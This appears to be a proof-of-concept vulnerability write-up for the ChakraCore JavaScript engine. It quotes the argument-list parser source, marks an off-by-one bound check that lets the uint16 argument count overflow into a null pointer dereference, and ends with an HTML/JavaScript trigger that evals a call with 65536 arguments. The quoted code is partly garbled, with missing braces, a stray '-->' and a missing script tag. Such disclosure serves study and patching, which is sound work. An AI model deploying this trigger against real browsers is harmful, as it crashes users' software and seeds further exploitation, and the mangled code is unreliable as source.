The root cause of the nullptr derefrencing is an overflow in Parser::ParseArgList

//ChakraCore-master\lib\Parser\Parse.cpp

/***************************************************************************

Parse a list of arguments.

***************************************************************************/

template<bool buildAST>

ParseNodePtr Parser::ParseArgList( bool *pCallOfConstants, uint16 *pSpreadArgCount, uint16 * pCount)

{

ParseNodePtr pnodeArg;

ParseNodePtr pnodeList = nullptr;

ParseNodePtr *lastNodeRef = nullptr;

// Check for an empty list

Assert(m_token.tk == tkLParen);

if (m_pscan->Scan() == tkRParen)

{

return nullptr;

}

*pCallOfConstants = true;

*pSpreadArgCount = 0;

int count=0;

while (true)

{

// the count of arguments has to fit in an unsigned short

if (count > 0xffffU)//SHOULD BE if (count >= oxffffU)

Error(ERRnoMemory);

// Allow spread in argument lists.

IdentToken token;

pnodeArg = ParseExpr<buildAST>(koplCma, nullptr, TRUE, /* fAllowEllipsis */TRUE, NULL, nullptr, nullptr, &token);

++count;//when count==0xffffU, an overflow occurs HERE!!!

this->MarkEscapingRef(pnodeArg, &token);

if (buildAST)

{

this->CheckArguments(pnodeArg);

if (*pCallOfConstants && !IsConstantInFunctionCall(pnodeArg))

{

*pCallOfConstants = false;

}

if (pnodeArg->nop == knopEllipsis)

{

(*pSpreadArgCount)++;

}

AddToNodeListEscapedUse(&pnodeList, &lastNodeRef, pnodeArg);

}

if (m_token.tk != tkComma)

{

break;

}

m_pscan->Scan();

if (m_token.tk == tkRParen && m_scriptContext->GetConfig()->IsES7TrailingCommaEnabled())

{

break;

}

if (pSpreadArgCount!=nullptr && (*pSpreadArgCount) > 0){

CHAKRATEL_LANGSTATS_INC_LANGFEATURECOUNT(SpreadFeature, m_scriptContext);

}

*pCount = static_cast<uint16>(count);

if (buildAST)

{

AssertMem(lastNodeRef);

AssertNodeMem(*lastNodeRef);

pnodeList->ichLim = (*lastNodeRef)->ichLim;

}

return pnodeList;

}

-->

<html>

<head>

</head>

var a=[];

a.length=0xFFFF+1;

a.fill('...a');

var b="function Car(){}; var car=new Car("+a.join()+");";

//alert(b);

eval(b);

</script>

</html>